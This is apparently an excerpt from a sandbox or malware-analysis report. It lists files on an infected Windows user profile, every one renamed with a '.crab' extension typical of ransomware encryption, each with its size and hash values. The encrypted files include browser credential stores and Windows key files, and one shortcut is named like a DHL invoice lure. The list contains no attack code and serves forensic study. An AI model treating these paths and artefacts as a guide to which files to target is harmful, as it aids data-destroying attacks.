c:\users\aetadzjz\appdata\roaming\il42fxfv-chsuxex.wav.crab 97.88 KB MD5: 81f075e5e50af4170ce71971a8435e5e
SHA1: a1ca9935eabff4ccc9f2c25c768465faf4cacbe3
SHA256: f98fb8a73d2c3bf6d8275983a4cb37de2e2e7e4b1c88cafbcfbe5575a1fb9a65 		False
...
c:\users\aetadzjz\appdata\roaming\j83b poqpbko1k0.wav.crab 98.57 KB MD5: 4fe80d30d78ed788eb56e49eb819146c
SHA1: cad2b1092b66119e0598ae8fdf5e52b07df32ec2
SHA256: 431adfa6488e49321b9c8c5e5b2d55327160a97153cb15ea7c2e2eddc74b58ec 		False
...
c:\users\aetadzjz\appdata\roaming\joph4qagf.ots.crab 10.93 KB MD5: 9261c176d32aff31b7688ca9b73a46bb
SHA1: 695a642db89867414c0321dd00e8e7c6925e8716
SHA256: 41053a82936eaf6d1f26032f4f5b4fd6a7e50820c71e861fdb257ad23f211f9c 		False
...
c:\users\aetadzjz\appdata\roaming\jq6x.m4a.crab 54.87 KB MD5: 06ed399d7a990df89ef90b45c036be5a
SHA1: f94e4420e074910a4bb2c329d577be702dc73ad0
SHA256: ce75142cc1ff783de5d70ae922e5916710eb00f5234222fc9295bc8e30614294 		False
...
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol.crab 0.80 KB MD5: 805775673556869eec4b529452ede739
SHA1: 315016f275b2bcdf38fe2ed8f11b5a7ab1b38f82
SHA256: f0da9dc5450c8f344820b6ef76083fb8f9fb632f454473506db14195c8c94192 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\access\accesscache.accdb.crab 196.51 KB MD5: 7338c81f5926dd31986b6b8841ecb1e3
SHA1: 4b0569e2e18586b30637e9aed45607d483012f21
SHA256: 22ab070cfec4c6ac6f70571db56ca5b5f5e7362738948f53a1fddcd8a75cf475 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\access\accesscache.laccdb.crab 0.57 KB MD5: 9ec7848dc8f3d8f20fad622d66588a4e
SHA1: 4f950b3d4526417187555f3ab3b570a4fe6a939a
SHA256: 94cff7ce4370897dc004c8653665b56207cfb90ac98079e0d928da30c6f10d35 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\access\system.mdw.crab 124.51 KB MD5: 99d7eb07f24e1409199c7d9335deb523
SHA1: d2d97ba4538616d5ee9e7a276f9e03715a560d0a
SHA256: 76d70ac7435848922f4184c68de5fa9daf258d1fdbefe786a07e089314a28a06 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\apasixtheditionofficeonline.xsl.crab 326.30 KB MD5: ba23252fa262059828976cee29de62d5
SHA1: eb3ecc1a04ca1087448734991fd6099cbece7a17
SHA256: 3b36194168f7513ec2c2f301326a7e26702ba649ba1af334ba3e2e754549c521 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\chicago.xsl.crab 290.57 KB MD5: 2dfb3c7a6bd3ce6cb88e406ecb76e548
SHA1: b391ece1e5de2504abb901e08f8c04d10b8f245f
SHA256: 1c25915690a7df812858a7471a6416ddd7446220167d4e585cd8d9a3f5efd020 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\gb.xsl.crab 262.88 KB MD5: 8b7c428232d17fa18564a9dce0d0d099
SHA1: 398d32757c3764925e99f2642bb07ba1100c2f79
SHA256: d5c36ad7f50fa0451d2946661358c1b511d8ebc0088ac9691396c498847c243d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\gostname.xsl.crab 250.87 KB MD5: 1001db0efe487b334e2303bf70048a82
SHA1: 869a58ca3a1e8b8384bc4577e4db275330fef1dc
SHA256: ce59b1c9623912f9efa2c7dfacd7706c2fa5d6935f0bdd1640ab65dc17703ab7 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\gosttitle.xsl.crab 246.07 KB MD5: 56e5729bb175c87fbe66a8b90ec93b53
SHA1: c6877ac82078b9afc543fe5b67a00f2ce8c1aad2
SHA256: 40ce8e8f448545ad1bec23b8892f0784e0acf37fee40eed45a35ee1873983c7a 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\harvardanglia2008officeonline.xsl.crab 278.65 KB MD5: 7c27dd7f6376f328f6bc73cdfce38af8
SHA1: ee8f104f847e07be4be1e175b096fbf9d9ef492e
SHA256: 8af6e005315e5d102f09e9332acb9ac76507893f90a7f82737b870973331565a 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\ieee2006officeonline.xsl.crab 288.13 KB MD5: 46fcaa13bcf4722b6c3bec683fa6f184
SHA1: e310b7bf2b7ec8f8c18f81b9fa9d1e54c52ffdd1
SHA256: 6a825530743f6f0fc1016d89dbe09a719716b3dbed516d9bcb57d9e58ca30150 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\iso690.xsl.crab 264.82 KB MD5: bf760973ba42b0433302431b6631d94c
SHA1: 7eddc0f870689a37890caaa30663eb151e891274
SHA256: beebed05ea9569efb9f3f8feab8fcba2452dffec55823f96428ff803b6732f27 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\iso690nmerical.xsl.crab 212.99 KB MD5: 16913a426612db57b60209b1661fa0a3
SHA1: 36bfb12b5673472e9642e07961b5d5389a2a139f
SHA256: 81358813a0d1ba8708bacbed54db526eee46afd2c10a394203432b9f7b70153a 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\mlaseventheditionofficeonline.xsl.crab 249.76 KB MD5: 0fefde82e846c637dd9ccdb2fe9eae55
SHA1: 08f3e04af2a16ea29b5de687c3e197d575b66352
SHA256: 9c64267e510a7cc2f1961df12434b377901e4f069fd4dff5c6dba307195d347a 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\sist02.xsl.crab 245.96 KB MD5: 10bacadc1282a6934946b0154f94b4fb
SHA1: 4be6dce686a7a12c738f5f7cf72fec3a4f77de63
SHA256: 58dc0ca77409237386448704c54a98491d0ed26653a6e2c7ecf9759214a824e7 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\turabian.xsl.crab 337.10 KB MD5: 2b5adde4f295899915122d1cf2295f1e
SHA1: 61e9345dc893d8aefd2b2bc8918e7c7ed001e02c
SHA256: a86e0c4921f5fe53fe34c9fb91f266c27844b199755fcec2f71646514d6591a7 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\83aa4cc77f591dfc2374580bbd95f6ba_500c0908-381e-49dc-a6a0-1a800e9a56e0.crab 0.55 KB MD5: ddaa7d8f06ff243f0e5c28ef70221842
SHA1: ff6f0078f8b4c2fe71a3f66a3c75aaa0a362958b
SHA256: da08508272699cb94c3244415f81cea01eb9ffd73d39b974b4db5be07bc750d7 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0.crab 0.57 KB MD5: 642d68d8ab9267930acee80fd39bbf46
SHA1: f0a66b675ab5c779ad3239388f0a1d5c9670d43d
SHA256: 45bdc93971dfd1b6d532ec2efd626c45fa5485025b647bf82275ac42c9f9aaa7 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\document building blocks\1033\16\built-in building blocks.dotx.crab 3.53 MB MD5: 8cd0dad83dee5162beba34b31395ae4f
SHA1: 4b94ab612a68f06af0e65f15b595bf656f4f886b
SHA256: 8a02509b1071dfb531880b4798a9d9dd25e8f2f1ca1794c79cdddd8995e65143 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\internet explorer\userdata\low\index.dat.crab 32.51 KB MD5: 749393a70bf44012ce1c81479127b39f
SHA1: cf687ad5a7db72f25bc5ea164824be773177465e
SHA256: 1c3e21a87ceb51a61b7e2f2eb1012181f6c332c645c476f2e501d36463c6d142 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\ms project\16\en-us\global.mpt.crab 1.21 MB MD5: bde6fcc136244dedc6fa01ae5f9e5092
SHA1: 741322648abcee47d5c566e3624bef13637fd93b
SHA256: a4eb3d01360a64dc1614f430423f7f999cb60971ad407ccdb4bb61a5d58927c6 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\office\mso1033.acl.crab 37.37 KB MD5: ba9a4ac383c7769a32bb3febf135ec26
SHA1: c61258a3aa33435419cbb38d4d90cb29b93fbfbf
SHA256: f122966d08e787a50bbfaafb945c61f6192a107bb9de018db832039ad3b62a90 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\office\recent\database1.lnk.crab 1.52 KB MD5: e7019febd65768a3d6b60e61df62779c
SHA1: 6d4686dff9a5b4735651348f8c7ab99bc8ba3274
SHA256: 40fc05697c0c1926a152e5f76385d69601ce5cafbd51b7361c1d42d9c1b2063f 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\office\recent\dhl_invoice_18553.lnk.crab 0.99 KB MD5: f1a8bd89ff1ab6828036ab838e7caa92
SHA1: 9f3dca9392d441b5cb6aec8bda47582047d39846
SHA256: 5967ce290c068a8d9d38ec26d02688bb20e1ba70dcede5e8b531e2d0a553c1b2 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\office\recent\global.lnk.crab 1.88 KB MD5: e2b21edc6c45162a28aa4e6e8e3a6f7c
SHA1: bb3e21f123ac067e73999626f69dc48b69c6ef81
SHA256: b9b553af526f6c59e73a815a21d84b8e8b14e2c2670636fac39a994de8725dca 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\office\recent\index.dat.crab 0.65 KB MD5: 6298085c4629877c7c8b25957cbdaadc
SHA1: 7176b849683fc56aa2b13473b58c8c27748cd919
SHA256: 2be1778d6df563fa64f9657286e880c8127a18fce60e3f851e89d0395057d6ec 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\office\recent\my documents.lnk.crab 1.38 KB MD5: 3831047ca82242eb8c0cb34f1afdc552
SHA1: dd43fd0a91418a4f74128f273809df70d35c8a75
SHA256: 614c55d4907b8fb203f7895041b8a038335197269e3962ea3d34c9a12529d7e2 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\office\recent\templates.lnk.crab 1.59 KB MD5: 2fa14b525a83c091f8c1a451e4819fd9
SHA1: 0d34e38e2097e43a28a35adfabe2309ac34c40be
SHA256: bd81dd1e082033a0da9c782340216f82d03bd23c4df78233048f5a639ad67e74 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\onenote\16.0\preferences.dat.crab 5.57 KB MD5: 44fc6df2afa7a3670bf861cfa561775e
SHA1: d46a40abfd84c38ef28060ec0992a51f554e8d5c
SHA256: 3e37ef5be69616affab5a9ad53e81b20e29181ae14a401b6665dcdc17482943b 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\outlook\outlook.srs.crab 3.01 KB MD5: 58cb7dc158697404f13a1b724da7bfc8
SHA1: 5a9f2ba3d3d553f6cfe0f18330fbd3aa92bae89d
SHA256: 6063c711a673c40e150f97736b33d30f5d888f1ccb3b5f88e16d504f46927b0e 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\outlook\outlook.xml.crab 1.09 KB MD5: e90f8d735cb99911a52814d6c9e6219e
SHA1: 0d298428a16409b42335bf89cadd42232452e020
SHA256: 57e54ff7671695818cdb85ec206ef49ce986b0e4aab6e94d58735f1c91257309 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\protect\credhist.crab 0.68 KB MD5: d0205cb1f1a93cc0b56f6d4944527c13
SHA1: c477cea7e46fc66ae240ac5f28429e2b1d99bf79
SHA256: 87b127bdd5422d450db885dc1f3f6dbeb026a8001f835728fde6b49335f3deb0 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-2345716840-1148442690-1481144037-1000\1862f3be-4467-4925-a93f-badcfb2203ba.crab 0.98 KB MD5: 10f6aa5b6a5fe1453100b7dfab90513f
SHA1: f82a08c8da4759c570013d5192ed5be40d021d25
SHA256: 063f5e13d6212f01d723ac0189714c6e112ebd1034e008da71cf1839c95c79cc 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-2345716840-1148442690-1481144037-1000\2ab03421-ab9c-4d63-8433-08c1054d525a.crab 0.98 KB MD5: 4deb816a158e18e7faf643d5f80579f0
SHA1: 1f81b2aff2755fbdf3b5cd3b9d50078fd7479763
SHA256: 98cc396a0f511e013c9ab3c31fbbce9ba92657d655cbfb0fb6a9e4baed6bd45d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-2345716840-1148442690-1481144037-1000\8d3ed5bb-9674-4045-8be3-b9270b93e90b.crab 0.98 KB MD5: 37b4396182b2edac059d3c132d1fbbb5
SHA1: c64393b9a18e5f04079fcb052791807bf27187b0
SHA256: e2a0ac387410601192da46086f7c053eafb34698d5b7ea5ce1e84dee12add29b 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-2345716840-1148442690-1481144037-1000\e9d127d6-64ac-4353-96d2-c19aaf9f738b.crab 0.98 KB MD5: 6e0e258d1f26281e55209c8b4146dace
SHA1: e724fe15b9c4af1bb50a1a9755751dbaa670f7ec
SHA256: d4da8f2833c282e08d7d9f7aa83eacca2f7f4370693bb2ea6b2f0a3bda5f6655 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-2345716840-1148442690-1481144037-1000\preferred.crab 0.54 KB MD5: 0bf9486a99a0cabe2fcd9fc96e6122f1
SHA1: 7bff59dfac32609b686ec8969eb29e069bf3d111
SHA256: cb8617fb40160d671a073c7122f111531514d77bc0111841e16bb11a44af06d4 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.crab 0.98 KB MD5: 97cf0e756c215960accf3a23e3921037
SHA1: 0a1cb97ec347697d23215051fc7af685fad19318
SHA256: 4b85c4956bd74e189d5be7b07f90547bda3d96b3ca1f2c26b8e5f03a56d46f3a 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\preferred.crab 0.54 KB MD5: aec0b0a52c1c0d4bc9895c38417a4a37
SHA1: 444590ef2d8ffc5eb9bd0953bdba87f68aa71c08
SHA256: e08825a8bdd99dea774e4b9a1241f2418925dd88a285f4096c2a544142e78475 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\protect\synchist.crab 0.59 KB MD5: 9097bfae8480b2ea218c3f47f048614f
SHA1: d1a77c3d2eabbb904805f04c0929b1ddf211a0b4
SHA256: d0fc6261b5c3c57b75583520097f5041fff7accf85129a8cfe59954a4dafabea 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\publisher building blocks\contentstore.xml.crab 0.68 KB MD5: 0da62e3fdc5644cc313d05c47b8eacd7
SHA1: 814c2f2cb6d4f577a87b48cdc0cf8229f58729c6
SHA256: f79e64c10ed7799b666e2925e3697eb6b402a0e3a66a51008e100f795fe52cb2 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\templates\normal.dotm.crab 18.85 KB MD5: 74e26b414020308566f738475e6fafb7
SHA1: 3c7f12354e0f57f49c5b2e5deb41fb82185124d9
SHA256: 75d94fe9ec92bdbb63bb1ab0e547adca9abbe10891474f83b3dae8fa39b47285 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\templates\~$normal.dotm.crab 0.68 KB MD5: 5914f4edbe5308ebd00272630efbde48
SHA1: 10da1d2da546be80125b9fca3a5be5d5faae2b19
SHA256: cac32f6df7bc429219ba65eaef1dde51303c1ea32ff392a15d73e8590177b875 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\uproof\custom.dic.crab 0.54 KB MD5: 91a8e27e4a26db58e2638cfdb13cd9ce
SHA1: ee08d9c5340ed89a216d2bc9e03ea537c29eb31c
SHA256: 9bbf3f488a7267763d7003ae986e8149811696c547f0b1933aa3e4e233c430bb 		False
...
c:\users\aetadzjz\appdata\roaming\mmkv-kmddgo i9qnlg2.gif.crab 92.16 KB MD5: fa668fc0a4b3f02d5f225dd41e3cad6e
SHA1: 6888e46e16635a03ccd34857fbf9cb9f72781722
SHA256: 3fb901c2c6648c663124d720d59a775e7e9550cb9a5c6cee292dfff64d81f386 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\crash reports\installtime20131025151332.crab 0.52 KB MD5: 52d4ab8cc8000b81af75b49577ed4ef9
SHA1: 66a2100d253176c0603821d95a52bde7d17eda67
SHA256: 87823f13bfadebd30c8a23d22a05f86d79921ed2facc3772fe182667263c39d9 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\addons.json.crab 0.54 KB MD5: e5529d1a7849a53a6e30b98aac2c77f7
SHA1: 6dfa417597245eceac3a1393e195bed913c9fe33
SHA256: 9abb1a75e33ab3649ca0bd15debd02ff318b976bf8fcdc62eeccdcb80c64bbb7 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json.crab 3.48 KB MD5: d2c883560c778d1821983000418e968d
SHA1: 618f1d2b04433e993c12e5b0434fd0aa8dab1f38
SHA256: 4724339e8a5b875dc39048be3cbc75e4aacf64a43bb054cc0bce14c9508024fd 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json.crab 3.48 KB MD5: 25209c18405dbc2e70009c06ce88337c
SHA1: 8415c91e21d0b7df73c68acd9c37a3ec55de8754
SHA256: da22149b7c6c3985f04fc644efab5ccd8eb6031898f75b9e5a96ad821fb3a9fb 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\cert8.db.crab 64.51 KB MD5: ee5b816c97aa465799e6538b341c36e9
SHA1: 261301c68c33955c843ab726136b259506f2b86d
SHA256: 6c7f4c9a02a706589dd273f935010ec46f8e6b429aab8c392501642033709d97 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\compatibility.ini.crab 0.71 KB MD5: 9b87c56abf380ee3118698dd7b381d35
SHA1: dac06cd5bc37985179eaaf1464626bf970f02856
SHA256: d32b71a3604be96a3fe02ef800e64edb926a1d62f9b733c1dcf64660619fd516 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\content-prefs.sqlite.crab 224.51 KB MD5: b6008964d13aebe8b6fbcdc1f4e1d6ca
SHA1: 848cf62aff324d09c2affa696b811cb392224d6d
SHA256: 6c69d8dc4f22f384b6affff1a5339fb8fe1d27f1b643bc5702ab89cfd1bb1c1c 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\cookies.sqlite.crab 512.51 KB MD5: 84d268dc5123876faa63cb67dee9f922
SHA1: e2984fecf86ce00f1a460046721df93ab7bc9dc4
SHA256: 1f734e357dcf74f63d25b68ef134ef8473a49be8cecb34b14ac7839be7e9d3be 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\downloads.sqlite.crab 96.51 KB MD5: 524adedf059b064b2424e6d6b93f7c98
SHA1: 96d73986d8b61e8cf9c86d37b780ef9e8c104c47
SHA256: 2f5c85be2c75f269ee259527726e7d366c6c4aadf9ec31631b6d307b4071e91d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\extensions.ini.crab 0.65 KB MD5: 5414c37847ff6b52250fcb2d11092eee
SHA1: 46495d9b7cf78a2429b7f45322e08001c22bae55
SHA256: 0fb6c8bb943b8b36ca22ce27500327f2455b75f64debdbfe04dff5a867334416 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\extensions.sqlite.crab 448.51 KB MD5: b61db4830dd3d7018e9dba4d549e5dfd
SHA1: 2ffd8c5eccd91b6883ec1842cb1a61170371409b
SHA256: 1e68fb9cef636bd943bbf724a35f969991ebd320b4104f394ebb96a1add0e01f 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\formhistory.sqlite.crab 192.51 KB MD5: 0b6f9332ff0bb1dbdcc7e934c1540347
SHA1: faaf389ede8076988128baa99df7faa23e195f1f
SHA256: cfa17aafa48918753915121873ad2a396d47a3bebfaf3b7305bc2cbc959b5893 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\healthreport.sqlite.crab 1.09 MB MD5: 45965aeeb53f556daccb4eed8f96ff42
SHA1: cbe9ed1f037d970bcd7e5ca772375d8ac0a04385
SHA256: e31e84eed275eeacde06d969f430c5ffc9e5eb02d36997918a22af9ed8161a5f 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\indexeddb\moz-safe-about+home\idb\818200132aebmoouht.sqlite.crab 2.34 MB MD5: b4c7d17ad8f383680b27c3d96efdfb6d
SHA1: e54224471f7d54ff0373fecd0406c87e49fd095d
SHA256: c627e9e55025d1a5fc25f32f4d037806bedd2059ff0ed1a6589854de154873d4 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\key3.db.crab 16.51 KB MD5: 836ad4ec98ee36479e383b527e5c6472
SHA1: a9b4b635de54d16fa2cba235bdfb6acb03cf75d1
SHA256: 70545c219c80e131ba333db0be5b92d031ec4ecadf23bd962a9543c29a1d2313 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\localstore.rdf.crab 1.76 KB MD5: ac95e1ce1686af1cf1d43337fe4d3554
SHA1: 5d9219198b8a65ab62beec617b7ae868464bcb5b
SHA256: a7d508649b41ec843a8b91e4349f4403521ce0ac45100f2f75d6767b30bfd9c0 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\marionette.log.crab 0.57 KB MD5: 0fea65b1eca061ccb58998960c1a2c0b
SHA1: 9daa6752cca8fc367044101c3adbf32c9cdee2c7
SHA256: fafe261e8a911669ebe47444a9161fa80291243064c2edb12ee95d20e6b3945f 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\mimetypes.rdf.crab 4.26 KB MD5: 4fd839a0e81565bb6874a2ccae77716f
SHA1: f1ffe55d9ceca982fe741019cb5c92a6b517022b
SHA256: be9ad7e71c0d62b8465f5e90aa9a662dc3a8eea6d436a145a4f4f62aa69d1f17 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\permissions.sqlite.crab 64.51 KB MD5: c3fda7d94a01a2e608559122174a6db2
SHA1: 7d4ece6f00219257523771371b7c2337a82d61b1
SHA256: 298cf34a82eddd3b39c1a0421a237ee3d816856c61111f9d2db64c5bdee65646 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\places.sqlite.crab 10.00 MB MD5: ca8a323ea4c18f6ea8bcaf4d9b7f6d51
SHA1: 0b174c9b9cd41923435cd089470779a517f959b7
SHA256: c21873c0af092892e0946440fd9fb957c18f4c4b4c146e64d5ee59e16dbdb2e6 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\pluginreg.dat.crab 3.66 KB MD5: 53f01a6d4e4992e2acc743b66cbf0850
SHA1: b4d38472a65fe3131373cd9c46824aeb0dbab496
SHA256: a38e5a889195dd229773fedf385e0d1a95210c2e7b7e51e256154b8f2f50ac91 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\prefs.js.crab 5.82 KB MD5: 08e964b318baab90525dae9abb7aa021
SHA1: bf15baec83be7d6b48ae4ae7ffe2caf5c1f53d99
SHA256: 02c667c41de1a1ccbe2b183a25e2d523ee1d5cdfdae397c68d01ea6cc7387c3c 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\search.json.crab 16.90 KB MD5: 40acd13159c974301a3d1c3268a2c8ea
SHA1: 2a0acb2df6f7e9014776a743947797bbb6487dfd
SHA256: 770d67c1412e4182b6fb6c3ed459681e50c4e304401ca21ab4ff7bc68c9a4d6c 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\secmod.db.crab 16.51 KB MD5: cb654ac5aa2b6a2ba616be127b7cec67
SHA1: 92d3b298387b8cc12e1d6ca3436ff820cfdbf672
SHA256: 56bb14a39ab5f73d2cdf046fe23038db33216a693565926a21d2c3fbddb48c65 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\sessionstore.bak.crab 3.45 KB MD5: 6c9c907ef8b6edf68f4aabc0108af2c9
SHA1: 70dd3ec2bc55356b16d6f58d7516eff5e0f49a9c
SHA256: 47f2c309f76410bb7607dd81d2db59f01869030dc45d8e01f26e426cddd00374 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\sessionstore.js.crab 1.07 KB MD5: 5b34b8ec117905b35d3574032edc1d9f
SHA1: 308b2b9896581d295bb8aefbc43b681590266d64
SHA256: 3e2037e2d84b24323945cad495c6a5fae69c4a876fb92dc31fa81b75add416e1 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\signons.sqlite.crab 320.51 KB MD5: 834b4751790994918734f1c536900ee4
SHA1: 774c10e76619b2d0b0249bdd87afdf406a20c52c
SHA256: 1f2f0064a5c9c349cded9e9e79387be68adc06aa056150cb484aee7de88bb9c6 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\times.json.crab 0.54 KB MD5: 80112e82c756b4bc61a40fa8e4334560
SHA1: d9b8045a686fd52fbfc70a277873ce093e3bef78
SHA256: 2fea774032d3b5e6529573744d512d4f6859fa0e0e35e52b1fa768483bc3a981 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\urlclassifierkey3.txt.crab 0.66 KB MD5: 78019e6644af409dfa0f7c3ae830ae8d
SHA1: e45e17ef819b8d2e4237e76a4d46f40e53f4fa7d
SHA256: 3da6ff1cdfed9f294a4bc0fe9475ddae390fed8f027d7d8124f1606d8f483cf1 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\webappsstore.sqlite.crab 96.51 KB MD5: 6823f153ae928cda0181a2394f8e6c39
SHA1: d96dc7e8e4ada4f02a5c7d26db0c4ec14bd1f570
SHA256: f0d05c9172be85dd5d02da3a6afe33c1f3ee77edeffa7c01a8c30632220d6f76 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles.ini.crab 0.62 KB MD5: 0434ae23279e54c338f27f8318868186
SHA1: 9cccd38d06005c495f40e2be2e4a72a994ab9d57
SHA256: a0adba1c71c345dccdb8065a040409b4c9b54468a997a0286167343692a147bd 		False
...
c:\users\aetadzjz\appdata\roaming\m_ngah.bmp.crab 25.12 KB MD5: 26768bd67456cfbc4021cf7c8ebf072f
SHA1: b36fbc2c690c9d69f2704bb73329e810863b798e
SHA256: 94dbf2ae377a67cd29137bfaebcfa8ebdf37c26769f8ff9b4b5bd2d5f5d38c5d 		False
...
c:\users\aetadzjz\appdata\roaming\n8kyoxbzyqa.pptx.crab 26.99 KB MD5: 4acd4c7abab8188b92ba0da75b9f00f5
SHA1: e8e3db0c270650dad10bb62703bf362ecc33ce4a
SHA256: 8544f68fb00fb3a45eb9016cd3fa583a0bcedbdf14a6c1bff2c2781470d28f6c 		False
...
c:\users\aetadzjz\appdata\roaming\nxrtca.png.crab 24.88 KB MD5: ae1807bdbe7810ebe52b2bd51b56a72c
SHA1: 9e21960d793f443500e5501a8e437a7d77441e18
SHA256: 331dee98dd39280701621b66be56352a5861a142b88661e16268dc60b98a3313 		False
...
c:\users\aetadzjz\appdata\roaming\pzhcokjzpznkmon1.xls.crab 88.02 KB MD5: b14fa6e36f088e9dc24aab61530fc7ee
SHA1: f5da347f1d2e4c8128a73bc9106261253aaa7b60
SHA256: f3990afd02a4117cc501d0236324e2f1345c5b466d5dc7a28789940e6ddc7446 		False
...
c:\users\aetadzjz\appdata\roaming\qfjjdt.swf.crab 40.32 KB MD5: 7ff06beae92bd247decc4169b12ab18c
SHA1: 3788cdab260bfab1c12152c09bd91ef851e23e88
SHA256: 9654334f8c12fcf1aba9b17b48ec3fa65a31030d337f25f26732d34ba5bb3d08 		False
...
c:\users\aetadzjz\appdata\roaming\rki k.ots.crab 17.73 KB MD5: 9871ed5e0fd9ee66746008f19e3d5143
SHA1: 7f938048a0b0d21ff9555ca5ee7cc4da3a316b7a
SHA256: 70ed4fd0a57ae022b055bffd6acaff6f7eefdbfef95ec3ac125b2b2b539cc683 		False
...
c:\users\aetadzjz\appdata\roaming\skype\roottools\roottools.conf.crab 0.59 KB MD5: 4232f812511bed6a3f37de1148a2d65b
SHA1: ae725d05cf5e7f1eec597e65964322e676759649
SHA256: d3af61aa66bf9010d724ba141e15fcf9838f6ebd5173a716de54845ede64747d 		False
...
c:\users\aetadzjz\appdata\roaming\smmet-ldvr0zx_olc3.jpg.crab 40.80 KB MD5: eb2a0be44d54b9ff551c06b2f8d87f4e
SHA1: 9ca802a792e7984f1122da07cd413754987d3df6
SHA256: 48ca440a0e9ce65573314ca26a85f676a076d902ca8211a3ae5d2da90fab534d 		False
...
